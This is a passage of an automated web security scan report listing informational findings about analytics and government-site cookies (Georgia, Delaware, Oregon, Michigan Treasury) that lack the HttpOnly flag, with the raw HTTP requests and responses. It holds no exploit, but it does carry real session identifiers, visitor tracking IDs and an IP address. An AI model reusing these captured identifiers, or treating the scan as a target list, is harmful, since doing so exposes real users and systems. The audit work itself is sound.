Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0068[CE]; Expires=Thu, 28 Apr 2016 12:28:24 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:24 GMT
Last-Modified: Sun, 01 May 2011 12:28:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www65
Content-Length: 0
Content-Type: text/plain
Connection: close


14.433. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s27148967052344

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s27148967052344 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www47
Content-Length: 0
Content-Type: text/plain
Connection: close


14.434. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s2762329166755

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s2762329166755 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC0069[CE]; Expires=Thu, 28 Apr 2016 12:28:25 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:25 GMT
Last-Modified: Sun, 01 May 2011 12:28:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www272
Content-Length: 0
Content-Type: text/plain
Connection: close


14.435. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s27866187379695

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s27866187379695 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC006A[CE]; Expires=Thu, 28 Apr 2016 12:28:26 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:26 GMT
Last-Modified: Sun, 01 May 2011 12:28:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www357
Content-Length: 0
Content-Type: text/plain
Connection: close


14.436. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s27866187379695

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s27866187379695?[AQB]&ndh=1&t=29/3/2011%2019%3A36%3A14%205%20300&ns=stateofgeorgia&pageName=GeorgiaGov%20-%20Online%20access%20to%20Georgia%20government.&g=http%3A//ga.gov/00/home/0%2C2061%2C4802%2C00.html%3Bjsessionid%3DE163D8F13AEF17647444D0A429B79A87&cc=USD&ch=georgiagov&server=port-4c%3A84&events=event3&c1=georgiagov&c2=georgiagov&h2=georgiagov&c3=georgiagov&v4=New&v5=8%3A30PM&v6=Friday&v7=Weekday&c8=New&v8=1&c9=8%3A30PM&c10=Friday&c11=Weekday&c12=1&c15=/00/home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 00:35:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DDACB4051D07FC-60000126C005F0CB[CE]; Expires=Thu, 28 Apr 2016 00:35:52 GMT; Domain=stateofgeorgia.122.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695?AQB=1&pccr=true&vidn=26DDACB4051D07FC-60000126C005F0CB&&ndh=1&t=29/3/2011%2019%3A36%3A14%205%20300&ns=stateofgeorgia&pageName=GeorgiaGov%20-%20Online%20access%20to%20Georgia%20government.&g=http%3A//ga.gov/00/home/0%2C2061%2C4802%2C00.html%3Bjsessionid%3DE163D8F13AEF17647444D0A429B79A87&cc=USD&ch=georgiagov&server=port-4c%3A84&events=event3&c1=georgiagov&c2=georgiagov&h2=georgiagov&c3=georgiagov&v4=New&v5=8%3A30PM&v6=Friday&v7=Weekday&c8=New&v8=1&c9=8%3A30PM&c10=Friday&c11=Weekday&c12=1&c15=/00/home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=998&bh=935&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 00:35:52 GMT
Last-Modified: Sun, 01 May 2011 00:35:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www254
Content-Length: 0
Content-Type: text/plain


14.437. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stateofgeorgia.122.2o7.net
Path:   /b/ss/georgiagovprod/1/H.16/s29011461706832

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/georgiagovprod/1/H.16/s29011461706832 HTTP/1.1
Host: stateofgeorgia.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26DDACB3851D250C-400001292008D758[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 12:28:28 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_ikax7Cigoiaxxx7Ex7Caj=[CS]v4|0-0|4DBC006C[CE]; Expires=Thu, 28 Apr 2016 12:28:28 GMT; Domain=.2o7.net; Path=/
Location: http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Fri, 29 Apr 2011 12:28:28 GMT
Last-Modified: Sun, 01 May 2011 12:28:28 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www393
Content-Length: 0
Content-Type: text/plain
Connection: close


14.438. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?&dcsdat=1304117499747&dcssip=de.gov&dcsuri=/&WT.tz=-5&WT.bh=17&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20The%20Official%20Website%20of%20the%20First%20State&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x879&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=de.gov/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://de.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAGAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBgAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Fri, 29 Apr 2011 22:51:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1304117499747&dcssip=de.gov&dcsuri=/&WT.tz=-5&WT.bh=17&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20The%20Official%20Website%20of%20the%20First%20State&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x879&WT.fv=10.2&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=de.gov/&WT.vt_f_a=2&WT.vt_f=2
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAHAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOZAu03mQLtNBwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADmQLtN5kC7TQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.439. http://statse.webtrendslive.com/dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?&dcscfg=4&dcsdat=1304123919127&dcssip=de.gov&dcsuri=/topics/agencylist_alpha&WT.co_f=173.193.214.243-1124471968.30145892&WT.vt_sid=173.193.214.243-1124471968.30145892.1304123919143&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20Alphabetical%20Listing%20of%20State%20Agencies&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2&WT.tv=1.1.0&WT.dl=0&WT.es=de.gov/topics/agencylist_alpha&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/agencylist_alpha
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAHAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNBwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sat, 30 Apr 2011 00:38:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcs5fmvbf00000cprngdzyrz5_9u7t/dcs.gif?dcsredirect=1&dcscfg=4&dcsdat=1304123919127&dcssip=de.gov&dcsuri=/topics/agencylist_alpha&WT.co_f=173.193.214.243-1124471968.30145892&WT.vt_sid=173.193.214.243-1124471968.30145892.1304123919143&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=19&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Delaware.gov%20--%20Alphabetical%20Listing%20of%20State%20Agencies&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=998x892&WT.fi=Yes&WT.fv=10.2&WT.tv=1.1.0&WT.dl=0&WT.es=de.gov/topics/agencylist_alpha&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1
Content-Length: 0
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1124471968.30145892; path=/dcs5fmvbf00000cprngdzyrz5_9u7t
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.440. http://statse.webtrendslive.com/dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif HTTP/1.1
Host: statse.webtrendslive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAHAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtNBwAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TQAAAAA-; WEBTRENDS_ID=173.193.214.243-1124471968.30145892;

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sat, 30 Apr 2011 12:28:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsvtpx6221e5hyrdsxs9yl5f_6q9i/njs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODkyAAAAAAAIAAAAFuIAAP9urE3YbKxNBI8AAG6isU1YorFNWOIAADv6t032+bdNXPcAANf7t033+bdNkZoAAEYMuE1FDLhN94sAAIe3uk2Vs7pNBMgAAOdAu03lQLtN10wAAG8AvE1vALxNCAAAANUiAAD/bqxN2GysTc84AABuorFNWKKxTcRNAAA7+rdN9vm3TQpQAADX+7dN9/m3TWwoAABGDLhNRQy4TfU4AACHt7pNlbO6TcZJAADnQLtN5UC7TeYeAABvALxNbwC8TQEAAADXTAAAIzE3My4xOTMuMjE0LjI0My0xMTI0NDcxOTY4LjMwMTQ1ODky; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


14.441. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gn4gg8ft HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://oregon.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:16:56 GMT
Expires: Sat, 30 Apr 2011 11:16:56 GMT
Cache-Control: private, max-age=86400
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=edcbe88731cf2b98:TM=1304162216:LM=1304162216:S=ajTeXl8mpL_zkkyq; expires=Mon, 29-Apr-2013 11:16:56 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1717

_callbacks_._0gn4gg8ft({'sl':{'auto':'Detect language','af':'Afrikaans','sq':'Albanian','ar':'Arabic','be':'Belarusian','bg':'Bulgarian','ca':'Catalan','zh-CN':'Chinese','hr':'Croatian','cs':'Czech','
...[SNIP]...

14.442. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://treas-secure.treas.state.mi.us
Path:   /eservice_enu/start.swe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /eservice_enu/start.swe?SWECmd=Start&SWEHo=treas-secure.treas.state.mi.us HTTP/1.1
Host: treas-secure.treas.state.mi.us
Connection: keep-alive
Referer: https://treas-secure.treas.state.mi.us/eservice_enu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
